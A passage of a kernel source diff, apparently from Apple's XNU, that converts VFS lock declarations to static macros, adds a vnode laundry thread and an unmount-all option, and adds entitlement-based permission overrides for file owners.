*/ proc_dirs_lock_shared(p); - lck_rw_lock_shared(rootvnode_rw_lock); + lck_rw_lock_shared(&rootvnode_rw_lock); if (!(fdp->fd_flags & FD_CHROOT)) { ndp->ni_rootdir = rootvnode; @@ -371,7 +371,7 @@ retry_copy: /* This should be a panic */ printf("fdp->fd_rdir is not set\n"); } - lck_rw_unlock_shared(rootvnode_rw_lock); + lck_rw_unlock_shared(&rootvnode_rw_lock); proc_dirs_unlock_shared(p); error = ENOENT; goto error_out; @@ -397,7 +397,7 @@ retry_copy: if (dp == NULLVP || (dp->v_lflag & VL_DEAD)) { dp = NULLVP; - lck_rw_unlock_shared(rootvnode_rw_lock); + lck_rw_unlock_shared(&rootvnode_rw_lock); proc_dirs_unlock_shared(p); error = ENOENT; goto error_out; @@ -440,7 +440,7 @@ retry_copy: } /* Now that we have our usecount, release the locks */ - lck_rw_unlock_shared(rootvnode_rw_lock); + lck_rw_unlock_shared(&rootvnode_rw_lock); proc_dirs_unlock_shared(p); ndp->ni_dvp = NULLVP; @@ -477,7 +477,7 @@ retry_copy: startdir_with_usecount = NULLVP; } if (rootdir_with_usecount) { - lck_rw_lock_shared(rootvnode_rw_lock); + lck_rw_lock_shared(&rootvnode_rw_lock); if (rootdir_with_usecount == rootvnode) { old_count = os_atomic_dec_orig(&rootdir_with_usecount->v_usecount, relaxed); if (old_count < 2) { @@ -489,7 +489,7 @@ retry_copy: } rootdir_with_usecount = NULLVP; } - lck_rw_unlock_shared(rootvnode_rw_lock); + lck_rw_unlock_shared(&rootvnode_rw_lock); if (rootdir_with_usecount) { vnode_rele(rootdir_with_usecount); rootdir_with_usecount = NULLVP; @@ -537,7 +537,7 @@ error_out: startdir_with_usecount = NULLVP; } if (rootdir_with_usecount) { - lck_rw_lock_shared(rootvnode_rw_lock); + lck_rw_lock_shared(&rootvnode_rw_lock); if (rootdir_with_usecount == rootvnode) { old_count = os_atomic_dec_orig(&rootdir_with_usecount->v_usecount, relaxed); if (old_count < 2) { @@ -547,9 +547,9 @@ error_out: panic("(4) Unexpected pre-decrement value (%d) of usecount for rootvnode %p", old_count, rootdir_with_usecount); } - lck_rw_unlock_shared(rootvnode_rw_lock); + 
lck_rw_unlock_shared(&rootvnode_rw_lock); } else { - lck_rw_unlock_shared(rootvnode_rw_lock); + lck_rw_unlock_shared(&rootvnode_rw_lock); vnode_rele(rootdir_with_usecount); } rootdir_with_usecount = NULLVP; diff --git a/bsd/vfs/vfs_quota.c b/bsd/vfs/vfs_quota.c index b58c75e27..6fd297c9d 100644 --- a/bsd/vfs/vfs_quota.c +++ b/bsd/vfs/vfs_quota.c @@ -79,15 +79,11 @@ /* vars for quota file lock */ -lck_grp_t * qf_lck_grp; -lck_grp_attr_t * qf_lck_grp_attr; -lck_attr_t * qf_lck_attr; +static LCK_GRP_DECLARE(qf_lck_grp, "quota file"); /* vars for quota list lock */ -lck_grp_t * quota_list_lck_grp; -lck_grp_attr_t * quota_list_lck_grp_attr; -lck_attr_t * quota_list_lck_attr; -lck_mtx_t * quota_list_mtx_lock; +static LCK_GRP_DECLARE(quota_list_lck_grp, "quuota list"); +static LCK_MTX_DECLARE(quota_list_mtx_lock, &quota_list_lck_grp); /* Routines to lock and unlock the quota global data */ static int dq_list_lock(void); @@ -131,41 +127,6 @@ static int qf_ref(struct quotafile *); static void qf_rele(struct quotafile *); -/* - * Initialize locks for the quota system. - */ -void -dqinit(void) -{ - /* - * Allocate quota list lock group attribute and group - */ - quota_list_lck_grp_attr = lck_grp_attr_alloc_init(); - quota_list_lck_grp = lck_grp_alloc_init("quota list", quota_list_lck_grp_attr); - - /* - * Allocate qouta list lock attribute - */ - quota_list_lck_attr = lck_attr_alloc_init(); - - /* - * Allocate quota list lock - */ - quota_list_mtx_lock = lck_mtx_alloc_init(quota_list_lck_grp, quota_list_lck_attr); - - - /* - * allocate quota file lock group attribute and group - */ - qf_lck_grp_attr = lck_grp_attr_alloc_init(); - qf_lck_grp = lck_grp_alloc_init("quota file", qf_lck_grp_attr); - - /* - * Allocate quota file lock attribute - */ - qf_lck_attr = lck_attr_alloc_init(); -} - /* * Report whether dqhashinit has been run.
*/ @@ -199,7 +160,7 @@ static volatile int dq_list_lock_cnt = 0; static int dq_list_lock(void) { - lck_mtx_lock(quota_list_mtx_lock); + lck_mtx_lock(&quota_list_mtx_lock); return ++dq_list_lock_cnt; } @@ -218,7 +179,7 @@ dq_list_lock_val(void) void dq_list_unlock(void) { - lck_mtx_unlock(quota_list_mtx_lock); + lck_mtx_unlock(&quota_list_mtx_lock); } @@ -230,7 +191,7 @@ dq_lock_internal(struct dquot *dq) { while (dq->dq_lflags & DQ_LLOCK) { dq->dq_lflags |= DQ_LWANT; - msleep(&dq->dq_lflags, quota_list_mtx_lock, PVFS, "dq_lock_internal", NULL); + msleep(&dq->dq_lflags, &quota_list_mtx_lock, PVFS, "dq_lock_internal", NULL); } dq->dq_lflags |= DQ_LLOCK; } @@ -253,21 +214,21 @@ dq_unlock_internal(struct dquot *dq) void dqlock(struct dquot *dq) { - lck_mtx_lock(quota_list_mtx_lock); + lck_mtx_lock(&quota_list_mtx_lock); dq_lock_internal(dq); - lck_mtx_unlock(quota_list_mtx_lock); + lck_mtx_unlock(&quota_list_mtx_lock); } void dqunlock(struct dquot *dq) { - lck_mtx_lock(quota_list_mtx_lock); + lck_mtx_lock(&quota_list_mtx_lock); dq_unlock_internal(dq); - lck_mtx_unlock(quota_list_mtx_lock); + lck_mtx_unlock(&quota_list_mtx_lock); } @@ -288,7 +249,7 @@ qf_get(struct quotafile *qfp, int type) } if ((qfp->qf_qflags & QTF_CLOSING)) { qfp->qf_qflags |= QTF_WANTED; - msleep(&qfp->qf_qflags, quota_list_mtx_lock, PVFS, "qf_get", NULL); + msleep(&qfp->qf_qflags, &quota_list_mtx_lock, PVFS, "qf_get", NULL); } } if (qfp->qf_vp != NULLVP) { @@ -308,7 +269,7 @@ qf_get(struct quotafile *qfp, int type) while ((qfp->qf_qflags & QTF_OPENING) || qfp->qf_refcnt) { qfp->qf_qflags |= QTF_WANTED; - msleep(&qfp->qf_qflags, quota_list_mtx_lock, PVFS, "qf_get", NULL); + msleep(&qfp->qf_qflags, &quota_list_mtx_lock, PVFS, "qf_get", NULL); } if (qfp->qf_vp == NULLVP) { qfp->qf_qflags &= ~QTF_CLOSING; @@ -405,7 +366,7 @@ dqfileinit(struct quotafile *qfp) qfp->qf_vp = NULLVP; qfp->qf_qflags = 0; - lck_mtx_init(&qfp->qf_lock, qf_lck_grp, qf_lck_attr); + lck_mtx_init(&qfp->qf_lock, &qf_lck_grp, 
LCK_ATTR_NULL); } diff --git 
a/bsd/vfs/vfs_subr.c b/bsd/vfs/vfs_subr.c index 4ae72ee3d..cadd662a6 100644 --- a/bsd/vfs/vfs_subr.c +++ b/bsd/vfs/vfs_subr.c @@ -147,15 +147,15 @@ #include #include -extern lck_grp_t *vnode_lck_grp; -extern lck_attr_t *vnode_lck_attr; +static LCK_GRP_DECLARE(vnode_lck_grp, "vnode"); +static LCK_ATTR_DECLARE(vnode_lck_attr, 0, 0); #if CONFIG_TRIGGERS -extern lck_grp_t *trigger_vnode_lck_grp; -extern lck_attr_t *trigger_vnode_lck_attr; +static LCK_GRP_DECLARE(trigger_vnode_lck_grp, "trigger_vnode"); +static LCK_ATTR_DECLARE(trigger_vnode_lck_attr, 0, 0); #endif -extern lck_mtx_t * mnt_list_mtx_lock; +extern lck_mtx_t mnt_list_mtx_lock; ZONE_DECLARE(specinfo_zone, "specinfo", sizeof(struct specinfo), ZC_NOENCRYPT | ZC_ZFREE_CLEARMEM); @@ -172,7 +172,6 @@ int vttoif_tab[9] = { S_IFSOCK, S_IFIFO, S_IFMT, }; - /* XXX These should be in a BSD accessible Mach header, but aren't. */ extern void memory_object_mark_used( memory_object_control_t control); @@ -259,6 +258,13 @@ TAILQ_HEAD(ragelst, vnode) vnode_rage_list; /* vnode rapid age list */ struct timeval rage_tv; int rage_limit = 0; int ragevnodes = 0; + +int deadvnodes_low = 0; +int deadvnodes_high = 0; + +uint64_t newvnode = 0; +uint64_t newvnode_nodead = 0; + static int vfs_unmountall_started = 0; #define RAGE_LIMIT_MIN 100 @@ -348,6 +354,7 @@ static int print_busy_vnodes = 0; /* print out bus } while(0) static void async_work_continue(void); +static void vn_laundry_continue(void); /* * Initialize the vnode management data structures. 
@@ -370,11 +377,19 @@ vntblinit(void) rage_limit = RAGE_LIMIT_MIN; } + deadvnodes_low = (desiredvnodes) / 100; + if (deadvnodes_low > 300) { + deadvnodes_low = 300; + } + deadvnodes_high = deadvnodes_low * 2; + /* * create worker threads */ kernel_thread_start((thread_continue_t)async_work_continue, NULL, &thread); thread_deallocate(thread); + kernel_thread_start((thread_continue_t)vn_laundry_continue, NULL, &thread); + thread_deallocate(thread); } /* the timeout is in 10 msecs */ @@ -461,7 +476,7 @@ vnode_hasdirtyblks(vnode_t vp) struct cl_writebehind *wbp; /* - * Not taking the buf_mtxp as there is little + * Not taking the buf_mtx as there is little * point doing it. Even if the lock is taken the * state can change right after that. If their * needs to be a synchronization, it must be driven @@ -488,7 +503,7 @@ int vnode_hascleanblks(vnode_t vp) { /* - * Not taking the buf_mtxp as there is little + * Not taking the buf_mtx as there is little * point doing it. Even if the lock is taken the * state can change right after that. 
If their * needs to be a synchronization, it must be driven @@ -903,7 +918,7 @@ mount_iterdrain(mount_t mp) { mount_list_lock(); while (mp->mnt_iterref) { - msleep((caddr_t)&mp->mnt_iterref, mnt_list_mtx_lock, PVFS, "mount_iterdrain", NULL); + msleep((caddr_t)&mp->mnt_iterref, &mnt_list_mtx_lock, PVFS, "mount_iterdrain", NULL); } /* mount iterations drained */ mp->mnt_iterref = -1; @@ -1308,7 +1323,7 @@ cache_purge_callback(mount_t mp, __unused void * arg) return VFS_RETURNED; } -extern lck_rw_t * rootvnode_rw_lock; +extern lck_rw_t rootvnode_rw_lock; extern void set_rootvnode(vnode_t); @@ -1655,7 +1670,7 @@ vfs_switch_root(const char *incoming_vol_old_path, pmi->pm_mount = pmi->pm_rootvnode->v_mount; } - lck_rw_lock_exclusive(rootvnode_rw_lock); + lck_rw_lock_exclusive(&rootvnode_rw_lock); /* Setup incoming as the new rootfs */ lck_rw_lock_exclusive(&incoming->mnt_rwlock); @@ -1701,6 +1716,11 @@ vfs_switch_root(const char *incoming_vol_old_path, vnode_unlock(outgoing_vol_new_covered_vp); lck_rw_done(&outgoing->mnt_rwlock); + if (!(outgoing->mnt_kern_flag & MNTK_VIRTUALDEV) && + (TAILQ_FIRST(&mountlist) == outgoing)) { + vfs_setmntsystem(outgoing); + } + /* * Finally, remove the mount_t linkage from the previously covered * vnodes on the old root volume. These were incoming_vol_old_path, @@ -1734,7 +1754,7 @@ vfs_switch_root(const char *incoming_vol_old_path, * prevents concurrent vnode_lookups. */ set_rootvnode(incoming_rootvnode); - lck_rw_unlock_exclusive(rootvnode_rw_lock); + lck_rw_unlock_exclusive(&rootvnode_rw_lock); if (!(incoming->mnt_kern_flag & MNTK_VIRTUALDEV) && !(outgoing->mnt_kern_flag & MNTK_VIRTUALDEV)) { @@ -2888,7 +2908,14 @@ vclean(vnode_t vp, int flags) } #if CONFIG_MACF - mac_vnode_notify_reclaim(vp); + if (vp->v_mount) { + /* + * It is possible for bdevvp vnodes to not have a mount + * pointer. It's fine to let it get reclaimed without + * notifying. 
+ */ + mac_vnode_notify_reclaim(vp); + } #endif if (active && (flags & DOCLOSE)) { @@ -2968,6 +2995,12 @@ vclean(vnode_t vp, int flags) } #endif +#if CONFIG_IO_COMPRESSION_STATS + if ((vp->io_compression_stats)) { + vnode_iocs_record_and_free(vp); + } +#endif /* CONFIG_IO_COMPRESSION_STATS */ + /* * Reclaim the vnode. */ @@ -3472,7 +3505,7 @@ extension_cmp(const void *a, const void *b) // them (i.e. a short 8 character name can't have an 8 // character extension). // -extern lck_mtx_t *pkg_extensions_lck; +extern lck_mtx_t pkg_extensions_lck; __private_extern__ int set_package_extensions_table(user_addr_t data, int nentries, int maxwidth) @@ -3503,7 +3536,7 @@ set_package_extensions_table(user_addr_t data, int nentries, int maxwidth) qsort(new_exts, nentries, maxwidth, extension_cmp); - lck_mtx_lock(pkg_extensions_lck); + lck_mtx_lock(&pkg_extensions_lck); old_exts = extension_table; old_nentries = nexts; @@ -3512,7 +3545,7 @@ set_package_extensions_table(user_addr_t data, int nentries, int maxwidth) nexts = nentries; max_ext_width = maxwidth; - lck_mtx_unlock(pkg_extensions_lck); + lck_mtx_unlock(&pkg_extensions_lck); kheap_free(KHEAP_DATA_BUFFERS, old_exts, (old_nentries * old_maxwidth) + 1); @@ -3550,7 +3583,7 @@ is_package_name(const char *name, int len) // advance over the "." name_ext++; - lck_mtx_lock(pkg_extensions_lck); + lck_mtx_lock(&pkg_extensions_lck); // now iterate over all the extensions to see if any match ptr = &extension_table[0]; @@ -3558,12 +3591,12 @@ is_package_name(const char *name, int len) extlen = strlen(ptr); if (strncasecmp(name_ext, ptr, extlen) == 0 && name_ext[extlen] == '\0') { // aha, a match! 
- lck_mtx_unlock(pkg_extensions_lck); + lck_mtx_unlock(&pkg_extensions_lck); return 1; } } - lck_mtx_unlock(pkg_extensions_lck); + lck_mtx_unlock(&pkg_extensions_lck); // if we get here, no extension matched return 0; @@ -3814,6 +3847,8 @@ out: struct unmount_info { int u_errs; // Total failed unmounts int u_busy; // EBUSY failed unmounts + int u_count; // Total volumes iterated + int u_only_non_system; }; static int @@ -3823,18 +3858,27 @@ unmount_callback(mount_t mp, void *arg) char *mntname; struct unmount_info *uip = arg; - mount_ref(mp, 0); - mount_iterdrop(mp); // avoid vfs_iterate deadlock in dounmount() + uip->u_count++; mntname = zalloc(ZV_NAMEI); strlcpy(mntname, mp->mnt_vfsstat.f_mntonname, MAXPATHLEN); - error = dounmount(mp, MNT_FORCE, 1, vfs_context_current()); - if (error) { - uip->u_errs++; - printf("Unmount of %s failed (%d)\n", mntname ? mntname:"?", error); - if (error == EBUSY) { - uip->u_busy++; + if (uip->u_only_non_system + && ((mp->mnt_flag & MNT_ROOTFS) || (mp->mnt_kern_flag & MNTK_SYSTEM))) { //MNTK_BACKS_ROOT + printf("unmount(%d) %s skipped\n", uip->u_only_non_system, mntname); + mount_iterdrop(mp); // VFS_ITERATE_CB_DROPREF + } else { + printf("unmount(%d) %s\n", uip->u_only_non_system, mntname); + + mount_ref(mp, 0); + mount_iterdrop(mp); // VFS_ITERATE_CB_DROPREF + error = dounmount(mp, MNT_FORCE, 1, vfs_context_current()); + if (error) { + uip->u_errs++; + printf("Unmount of %s failed (%d)\n", mntname ? mntname:"?", error); + if (error == EBUSY) { + uip->u_busy++; + } } } if (mntname) { @@ -3850,21 +3894,23 @@ unmount_callback(mount_t mp, void *arg) * Busy mounts are retried. */ __private_extern__ void -vfs_unmountall(void) +vfs_unmountall(int only_non_system) { int mounts, sec = 1; struct unmount_info ui; vfs_unmountall_started = 1; + printf("vfs_unmountall(%ssystem) start\n", only_non_system ? 
"non" : ""); retry: - ui.u_errs = ui.u_busy = 0; + ui.u_errs = ui.u_busy = ui.u_count = 0; + ui.u_only_non_system = only_non_system; + // avoid vfs_iterate deadlock in dounmount(), use VFS_ITERATE_CB_DROPREF vfs_iterate(VFS_ITERATE_CB_DROPREF | VFS_ITERATE_TAIL_FIRST, unmount_callback, &ui); mounts = mount_getvfscnt(); if (mounts == 0) { return; } - if (ui.u_busy > 0) { // Busy mounts - wait & retry tsleep(&nummounts, PVFS, "busy mount", sec * hz); sec *= 2; @@ -3872,10 +3918,12 @@ retry: goto retry; } printf("Unmounting timed out\n"); - } else if (ui.u_errs < mounts) { + } else if (ui.u_count < mounts) { // If the vfs_iterate missed mounts in progress - wait a bit tsleep(&nummounts, PVFS, "missed mount", 2 * hz); } + + printf("vfs_unmountall(%ssystem) end\n", only_non_system ? "non" : ""); } /* @@ -4201,15 +4249,13 @@ vfs_init_io_attributes(vnode_t devvp, mount_t mp) } static struct klist fs_klist; -lck_grp_t *fs_klist_lck_grp; -lck_mtx_t *fs_klist_lock; +static LCK_GRP_DECLARE(fs_klist_lck_grp, "fs_klist"); +static LCK_MTX_DECLARE(fs_klist_lock, &fs_klist_lck_grp); void vfs_event_init(void) { klist_init(&fs_klist); - fs_klist_lck_grp = lck_grp_alloc_init("fs_klist", NULL); - fs_klist_lock = lck_mtx_alloc_init(fs_klist_lck_grp, NULL); } void @@ -4228,9 +4274,9 @@ vfs_event_signal(fsid_t *fsid, u_int32_t event, intptr_t data) } } - lck_mtx_lock(fs_klist_lock); + lck_mtx_lock(&fs_klist_lock); KNOTE(&fs_klist, event); - lck_mtx_unlock(fs_klist_lock); + lck_mtx_unlock(&fs_klist_lock); } /* @@ -4615,9 +4661,9 @@ filt_fsattach(struct knote *kn, __unused struct kevent_qos_s *kev) kn->kn_flags |= EV_CLEAR; /* automatic */ kn->kn_sdata = 0; /* incoming data is ignored */ - lck_mtx_lock(fs_klist_lock); + lck_mtx_lock(&fs_klist_lock); KNOTE_ATTACH(&fs_klist, kn); - lck_mtx_unlock(fs_klist_lock); + lck_mtx_unlock(&fs_klist_lock); /* * filter only sees future events, @@ -4629,9 +4675,9 @@ filt_fsattach(struct knote *kn, __unused struct kevent_qos_s *kev) static void 
filt_fsdetach(struct knote *kn) { - lck_mtx_lock(fs_klist_lock); + lck_mtx_lock(&fs_klist_lock); KNOTE_DETACH(&fs_klist, kn); - lck_mtx_unlock(fs_klist_lock); + lck_mtx_unlock(&fs_klist_lock); } static int @@ -4654,7 +4700,7 @@ filt_fstouch(struct knote *kn, struct kevent_qos_s *kev) { int res; - lck_mtx_lock(fs_klist_lock); + lck_mtx_lock(&fs_klist_lock); kn->kn_sfflags = kev->fflags; @@ -4670,7 +4716,7 @@ filt_fstouch(struct knote *kn, struct kevent_qos_s *kev) // kn->kn_fflags &= kn->kn_sfflags; res = (kn->kn_fflags != 0); - lck_mtx_unlock(fs_klist_lock); + lck_mtx_unlock(&fs_klist_lock); return res; } @@ -4680,12 +4726,12 @@ filt_fsprocess(struct knote *kn, struct kevent_qos_s *kev) { int res = 0; - lck_mtx_lock(fs_klist_lock); + lck_mtx_lock(&fs_klist_lock); if (kn->kn_fflags) { knote_fill_kevent(kn, kev, 0); res = 1; } - lck_mtx_unlock(fs_klist_lock); + lck_mtx_unlock(&fs_klist_lock); return res; } @@ -4781,7 +4827,8 @@ sysctl_vfs_generic_conf SYSCTL_HANDLER_ARGS } /* the vfs.generic. branch. 
*/ -SYSCTL_NODE(_vfs, VFS_GENERIC, generic, CTLFLAG_RW | CTLFLAG_LOCKED, NULL, "vfs generic hinge"); +SYSCTL_EXTENSIBLE_NODE(_vfs, VFS_GENERIC, generic, + CTLFLAG_RW | CTLFLAG_LOCKED, NULL, "vfs generic hinge"); /* retreive a list of mounted filesystem fsid_t */ SYSCTL_PROC(_vfs_generic, OID_AUTO, vfsidlist, CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_LOCKED, @@ -4857,7 +4904,7 @@ long num_reusedvnodes = 0; static vnode_t -process_vp(vnode_t vp, int want_vp, int *deferred) +process_vp(vnode_t vp, int want_vp, bool can_defer, int *deferred) { unsigned int vpid; @@ -4916,7 +4963,7 @@ process_vp(vnode_t vp, int want_vp, int *deferred) * Checks for anyone racing us for recycle */ if (vp->v_type != VBAD) { - if (want_vp && (vnode_on_reliable_media(vp) == FALSE || (vp->v_flag & VISDIRTY))) { + if ((want_vp || can_defer) && (vnode_on_reliable_media(vp) == FALSE || (vp->v_flag & VISDIRTY))) { vnode_async_list_add(vp); vnode_unlock(vp); @@ -4979,7 +5026,7 @@ async_work_continue(void) vp = TAILQ_FIRST(q); - vp = process_vp(vp, 0, &deferred); + vp = process_vp(vp, 0, false, &deferred); if (vp != NULLVP) { panic("found VBAD vp (%p) on async queue", vp); @@ -4987,6 +5034,68 @@ async_work_continue(void) } } +__attribute__((noreturn)) +static void +vn_laundry_continue(void) +{ + struct freelst *free_q; + struct ragelst *rage_q; + int deferred; + vnode_t vp; + bool rage_q_empty; + bool free_q_empty; + + + free_q = &vnode_free_list; + rage_q = &vnode_rage_list; + + for (;;) { + vnode_list_lock(); + + free_q_empty = TAILQ_EMPTY(free_q); + rage_q_empty = TAILQ_EMPTY(rage_q); + + if (!rage_q_empty && !free_q_empty) { + struct timeval current_tv; + + microuptime(&current_tv); + if (ragevnodes < rage_limit && + ((current_tv.tv_sec - rage_tv.tv_sec) < RAGE_TIME_LIMIT)) { + rage_q_empty = true; + } + } + + if (deadvnodes >= deadvnodes_high || + (rage_q_empty && free_q_empty) || + numvnodes < desiredvnodes) { + assert_wait(free_q, (THREAD_UNINT)); + + vnode_list_unlock(); + + 
thread_block((thread_continue_t)vn_laundry_continue); + + continue; + } + + if (!rage_q_empty) { + vp = TAILQ_FIRST(rage_q); + } else { + vp = TAILQ_FIRST(free_q); + } + + vp = process_vp(vp, 0, true, &deferred); + } +} + +static inline void +wakeup_laundry_thread() +{ + if ((deadvnodes < deadvnodes_low) && + /* Minimum number of free vnodes the thread should act on */ + ((freevnodes + ragevnodes) > 10)) { + wakeup(&vnode_free_list); + } +} static int new_vnode(vnode_t *vpp) @@ -5006,6 +5115,7 @@ retry: vp = NULLVP; vnode_list_lock(); + newvnode++; if (need_reliable_vp == TRUE) { async_work_timed_out++; @@ -5019,6 +5129,9 @@ retry: * Can always reuse a dead one */ vp = TAILQ_FIRST(&vnode_dead_list); + if (numvnodes >= desiredvnodes) { + wakeup_laundry_thread(); + } goto steal_this_vp; } /* @@ -5026,11 +5139,14 @@ retry: * the limit, we'll create a new vnode */ numvnodes++; + if (numvnodes >= desiredvnodes) { + wakeup_laundry_thread(); + } vnode_list_unlock(); vp = zalloc_flags(vnode_zone, Z_WAITOK | Z_ZERO); VLISTNONE(vp); /* avoid double queue removal */ - lck_mtx_init(&vp->v_lock, vnode_lck_grp, vnode_lck_attr); + lck_mtx_init(&vp->v_lock, &vnode_lck_grp, &vnode_lck_attr); TAILQ_INIT(&vp->v_ncchildren); @@ -5048,6 +5164,9 @@ retry: vp->v_iocount = 1; goto done; } + + wakeup_laundry_thread(); + microuptime(&current_tv); #define MAX_WALK_COUNT 1000 @@ -5060,16 +5179,6 @@ retry: panic("new_vnode: vp (%p) on RAGE list not marked VLIST_RAGE", vp); } - /* - * skip free vnodes created by bdevvp as they are - * typically not fully constructedi and may have issues - * in getting reclaimed. - */ - if (vp->v_flag & VBDEVVP) { - bdevvp_vnodes++; - continue; - } - // if we're a dependency-capable process, skip vnodes that can // cause recycling deadlocks. (i.e. this process is diskimages // helper and the vnode is in a disk image). 
Querying the @@ -5108,16 +5217,6 @@ retry: */ walk_count = 0; TAILQ_FOREACH(vp, &vnode_free_list, v_freelist) { - /* - * skip free vnodes created by bdevvp as they are - * typically not fully constructedi and may have issues - * in getting reclaimed. - */ - if (vp->v_flag & VBDEVVP) { - bdevvp_vnodes++; - continue; - } - // if we're a dependency-capable process, skip vnodes that can // cause recycling deadlocks. (i.e. this process is diskimages // helper and the vnode is in a disk image). Querying the @@ -5217,8 +5316,9 @@ retry: *vpp = NULL; return ENFILE; } + newvnode_nodead++; steal_this_vp: - if ((vp = process_vp(vp, 1, &deferred)) == NULLVP) { + if ((vp = process_vp(vp, 1, true, &deferred)) == NULLVP) { if (deferred) { int elapsed_msecs; struct timeval elapsed_tv; @@ -8006,6 +8106,14 @@ vnode_authorize_posix(vauth_ctx vcp, int action, int on_dir) } owner_ok = (needed & vap->va_mode) == needed; + /* + * Processes with the appropriate entitlement can marked themselves as + * ignoring file/directory permissions if they own it. 
+ */ + if (!owner_ok && proc_ignores_node_permissions(vfs_context_proc(vcp->ctx))) { + owner_ok = 1; + } + /* group permissions */ needed = 0; if (action & VREAD) { @@ -8037,6 +8145,7 @@ vnode_authorize_posix(vauth_ctx vcp, int action, int on_dir) _SETWHERE("all"); goto out; } + if (!owner_ok && !group_ok && !world_ok) { _SETWHERE("all"); error = EACCES; @@ -8199,6 +8308,10 @@ vnode_authorize_delete(vauth_ctx vcp, boolean_t cached_delete_child) switch (eval.ae_result) { case KAUTH_RESULT_DENY: + if (vauth_file_owner(vcp) && proc_ignores_node_permissions(vfs_context_proc(vcp->ctx))) { + KAUTH_DEBUG("%p Override DENY due to entitlement", vcp->vp); + return 0; + } KAUTH_DEBUG("%p DENIED - denied by ACL", vcp->vp); return EACCES; case KAUTH_RESULT_ALLOW: @@ -8267,6 +8380,10 @@ vnode_authorize_delete(vauth_ctx vcp, boolean_t cached_delete_child) } switch (eval.ae_result) { case KAUTH_RESULT_DENY: + if (vauth_dir_owner(vcp) && proc_ignores_node_permissions(vfs_context_proc(vcp->ctx))) { + KAUTH_DEBUG("%p Override DENY due to entitlement", vcp->vp); + return 0; + } KAUTH_DEBUG("%p DENIED - denied by directory ACL", vcp->vp); return EACCES; case KAUTH_RESULT_ALLOW: @@ -8390,6 +8507,10 @@ vnode_authorize_simple(vauth_ctx vcp, kauth_ace_rights_t acl_rights, kauth_ace_r switch (eval.ae_result) { case KAUTH_RESULT_DENY: + if (vauth_file_owner(vcp) && proc_ignores_node_permissions(vfs_context_proc(vcp->ctx))) { + KAUTH_DEBUG("%p Override DENY due to entitlement", vcp->vp); + return 0; + } KAUTH_DEBUG("%p DENIED - by ACL", vcp->vp); return EACCES; /* deny, deny, counter-allege */ case KAUTH_RESULT_ALLOW: @@ -8516,7 +8637,8 @@ vnode_authorize_simple(vauth_ctx vcp, kauth_ace_rights_t acl_rights, kauth_ace_r * Check for file immutability. 
*/ static int -vnode_authorize_checkimmutable(mount_t mp, struct vnode_attr *vap, int rights, int ignore) +vnode_authorize_checkimmutable(mount_t mp, vauth_ctx vcp, + struct vnode_attr *vap, int rights, int ignore) { int error; int append; @@ -8569,6 +8691,22 @@ vnode_authorize_checkimmutable(mount_t mp, struct vnode_attr *vap, int rights, i } } if ((error = vnode_immutable(vap, append, ignore)) != 0) { + if (error && !ignore) { + /* + * In case of a rename, we want to check ownership for dvp as well. + */ + int owner = 0; + if (rights & KAUTH_VNODE_DELETE_CHILD && vcp->dvp != NULL) { + owner = vauth_file_owner(vcp) && vauth_dir_owner(vcp); + } else { + owner = vauth_file_owner(vcp); + } + if (owner && proc_ignores_node_permissions(vfs_context_proc(vcp->ctx))) { + error = vnode_immutable(vap, append, 1); + } + } + } + if (error) { KAUTH_DEBUG("%p DENIED - file is immutable", vap); goto out; } @@ -8779,14 +8917,14 @@ vnode_attr_authorize_internal(vauth_ctx vcp, mount_t mp, * In the deletion case, parent directory immutability vetoes specific * file rights. 
*/ - if ((result = vnode_authorize_checkimmutable(mp, vcp->vap, rights, + if ((result = vnode_authorize_checkimmutable(mp, vcp, vcp->vap, rights, noimmutable)) != 0) { goto out; } if ((rights & KAUTH_VNODE_DELETE) && !parent_authorized_for_delete_child) { - result = vnode_authorize_checkimmutable(mp, vcp->dvap, + result = vnode_authorize_checkimmutable(mp, vcp, vcp->dvap, KAUTH_VNODE_DELETE_CHILD, 0); if (result) { goto out; @@ -10687,7 +10825,7 @@ vnode_resolver_create(mount_t mp, vnode_t vp, struct vnode_trigger_param *tinfo, return ENOMEM; } - lck_mtx_init(&rp->vr_lock, trigger_vnode_lck_grp, trigger_vnode_lck_attr); + lck_mtx_init(&rp->vr_lock, &trigger_vnode_lck_grp, &trigger_vnode_lck_attr); rp->vr_resolve_func = tinfo->vnt_resolve_func; rp->vr_unresolve_func = tinfo->vnt_unresolve_func; @@ -10726,7 +10864,7 @@ vnode_resolver_release(vnode_resolve_t rp) rp->vr_reclaim_func(NULLVP, rp->vr_data); } - lck_mtx_destroy(&rp->vr_lock, trigger_vnode_lck_grp); + lck_mtx_destroy(&rp->vr_lock, &trigger_vnode_lck_grp); kheap_free(KHEAP_DEFAULT, rp, sizeof(struct vnode_resolve)); } diff --git a/bsd/vfs/vfs_syscalls.c b/bsd/vfs/vfs_syscalls.c index cb7cf97fd..a1c721e9e 100644 --- a/bsd/vfs/vfs_syscalls.c +++ b/bsd/vfs/vfs_syscalls.c @@ -253,11 +253,14 @@ int sync_internal(void); __private_extern__ int unlink1(vfs_context_t, vnode_t, user_addr_t, enum uio_seg, int); -extern lck_grp_t *fd_vn_lck_grp; -extern lck_grp_attr_t *fd_vn_lck_grp_attr; -extern lck_attr_t *fd_vn_lck_attr; +static LCK_GRP_DECLARE(fd_vn_lck_grp, "fd_vnode_data"); +static LCK_ATTR_DECLARE(fd_vn_lck_attr, 0, 0); -extern lck_rw_t * rootvnode_rw_lock; +/* vars for sync mutex */ +static LCK_GRP_DECLARE(sync_mtx_lck_grp, "sync thread"); +static LCK_MTX_DECLARE(sync_mtx_lck, &sync_mtx_lck_grp); + +extern lck_rw_t rootvnode_rw_lock; /* * incremented each time a mount or unmount operation occurs @@ -859,6 +862,11 @@ mount_common(char *fstypename, vnode_t pvp, vnode_t vp, } #endif /* CONFIG_NFS_CLIENT || DEVFS */ 
